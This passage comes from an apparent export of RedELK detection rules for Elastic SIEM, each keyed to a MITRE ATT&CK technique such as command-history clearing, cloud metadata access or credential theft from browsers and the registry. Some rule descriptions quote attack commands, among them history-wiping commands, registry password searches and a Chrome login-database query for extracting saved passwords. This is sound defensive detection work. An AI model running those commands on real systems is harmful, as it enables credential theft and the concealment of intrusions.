T1115","references":["https://attack.mitre.org/techniques/T1115"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1115","name":"Clipboard Data","id":"T1115"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done.\nThese logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\nAdversaries can use a variety of methods to prevent their own commands from appear in these logs, such as clearing the history environment variable (unset HISTFILE), setting the command history size to zero (export HISTFILESIZE=0), manually clearing the history (history -c), or deleting the bash history file rm ~/.bash_history.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1146","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1146] Clear Command History","query":"threat.technique.id: T1146","references":["https://attack.mitre.org/techniques/T1146","https://attack.mitre.org/techniques/T1070/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1146","name":"Clear Command History","id":"T1146"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.[1] A cloud metadata API has been used in at least one high profile compromise.[2]\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.[3]\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1522","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1522] Cloud Instance Metadata API","query":"threat.technique.id: T1522","references":["https://attack.mitre.org/techniques/T1522","https://attack.mitre.org/techniques/T1552/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1522","name":"Cloud Instance Metadata API","id":"T1522"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.[1]\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1538","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1538] Cloud Service Dashboard","query":"threat.technique.id: T1538","references":["https://attack.mitre.org/techniques/T1538"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1538","name":"Cloud Service Dashboard","id":"T1538"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc.\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[1][2]\nStormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[3][4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1526","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1526] Cloud Service Discovery","query":"threat.technique.id: T1526","references":["https://attack.mitre.org/techniques/T1526"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1526","name":"Cloud Service Discovery","id":"T1526"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.\nThere are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript/JScript and Visual Basic.\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1059","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1059] Command-Line Interface","query":"threat.technique.id: T1059","references":["https://attack.mitre.org/techniques/T1059"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1059","name":"Command-Line Interface","id":"T1059"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. [1] The certificates used during an operation may be created, acquired, or stolen by the adversary. [2] [3] Unlike Invalid Code Signature, this activity will result in a valid signature.\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. [1]\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1116","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1116] Code Signing","query":"threat.technique.id: T1116","references":["https://attack.mitre.org/techniques/T1116","https://attack.mitre.org/techniques/T1553/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1116","name":"Code Signing","id":"T1116"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Commonly Used Port","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1043","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1043] Commonly Used Port","query":"threat.technique.id: T1043","references":["https://attack.mitre.org/techniques/T1043","https://attack.mitre.org/techniques/T1571"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1043","name":"Commonly Used Port","id":"T1043"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1092","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1092] Communication Through Removable Media","query":"threat.technique.id: T1092","references":["https://attack.mitre.org/techniques/T1092"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1092","name":"Communication Through Removable Media","id":"T1092"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.[1]\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a Phishing. Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1500","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1500] Compile After Delivery","query":"threat.technique.id: T1500","references":["https://attack.mitre.org/techniques/T1500","https://attack.mitre.org/techniques/T1027/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1500","name":"Compile After Delivery","id":"T1500"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. [1] CHM content is displayed using underlying components of the Internet Explorer browser [2] loaded by the HTML Help executable program (hh.exe). [3]\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. [4] [5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1223","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1223] Compiled HTML File","query":"threat.technique.id: T1223","references":["https://attack.mitre.org/techniques/T1223","https://attack.mitre.org/techniques/T1218/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1223","name":"Compiled HTML File","id":"T1223"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1223","name":"Compiled HTML File","id":"T1223"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1109","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1109] Component Firmware","query":"threat.technique.id: T1109","references":["https://attack.mitre.org/techniques/T1109","https://attack.mitre.org/techniques/T1542/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1109","name":"Component Firmware","id":"T1109"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1109","name":"Component Firmware","id":"T1109"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Component Object Model and Distributed COM","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1175","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1175] Component Object Model and Distributed COM","query":"threat.technique.id: T1175","references":["https://attack.mitre.org/techniques/T1175","https://attack.mitre.org/techniques/T1021"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1175","name":"Component Object Model and Distributed COM","id":"T1175"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1175","name":"Component Object Model and Distributed COM","id":"T1175"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.[1] References to various COM objects are stored in the Registry.\nAdversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.[2] An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1122","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1122] Component Object Model Hijacking","query":"threat.technique.id: T1122","references":["https://attack.mitre.org/techniques/T1122","https://attack.mitre.org/techniques/T1546/015"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1122","name":"Component Object Model Hijacking","id":"T1122"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1122","name":"Component Object Model Hijacking","id":"T1122"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. [1] Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1090","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1090] Connection Proxy","query":"threat.technique.id: T1090","references":["https://attack.mitre.org/techniques/T1090"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1090","name":"Connection Proxy","id":"T1090"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1090","name":"Connection Proxy","id":"T1090"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1136","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1136] Create Account","query":"threat.technique.id: T1136","references":["https://attack.mitre.org/techniques/T1136"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1136","name":"Create Account","id":"T1136"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. [1] [2] Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. [1] [2] [3]\nFor ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. [1]\nMalicious Control Panel items can be delivered via Phishing campaigns [2] [3] or executed as part of multi-stage malware. [4] Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1196","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1196] Control Panel Items","query":"threat.technique.id: T1196","references":["https://attack.mitre.org/techniques/T1196","https://attack.mitre.org/techniques/T1218/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1196","name":"Control Panel Items","id":"T1196"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1196","name":"Control Panel Items","id":"T1196"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1003","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1003] Credential Dumping","query":"threat.technique.id: T1003","references":["https://attack.mitre.org/techniques/T1003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1003","name":"Credential Dumping","id":"T1003"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may acquire credentials from web browsers by reading files specific to the target browser.[1] Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. [2]\nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. [3][4]\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.[5]\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1503","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1503] Credentials from Web Browsers","query":"threat.technique.id: T1503","references":["https://attack.mitre.org/techniques/T1503","https://attack.mitre.org/techniques/T1555/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1503","name":"Credentials from Web Browsers","id":"T1503"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\nIt is possible to extract passwords from backups or saved virtual machines through OS Credential Dumping. [1] Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. [2]\nIn cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1081","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1081] Credentials in Files","query":"threat.technique.id: T1081","references":["https://attack.mitre.org/techniques/T1081","https://attack.mitre.org/techniques/T1552/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1081","name":"Credentials in Files","id":"T1081"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\nExample commands to find Registry keys related to password information: [1]\nLocal Machine Hive: reg query HKLM /f password /t REG_SZ /s\nCurrent User Hive: reg query HKCU /f password /t REG_SZ /s","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1214","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1214] Credentials in Registry","query":"threat.technique.id: T1214","references":["https://attack.mitre.org/techniques/T1214","https://attack.mitre.org/techniques/T1552/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1214","name":"Credentials in Registry","id":"T1214"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.[1] Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\nICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; [2] however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1094","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1094] Custom Command and Control Protocol","query":"threat.technique.id: T1094","references":["https://attack.mitre.org/techniques/T1094","https://attack.mitre.org/techniques/T1095"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1094","name":"Custom Command and Control Protocol","id":"T1094"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1024","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1024] Custom Cryptographic Protocol","query":"threat.technique.id: T1024","references":["https://attack.mitre.org/techniques/T1024","https://attack.mitre.org/techniques/T1573"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1024","name":"Custom Cryptographic Protocol","id":"T1024"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo 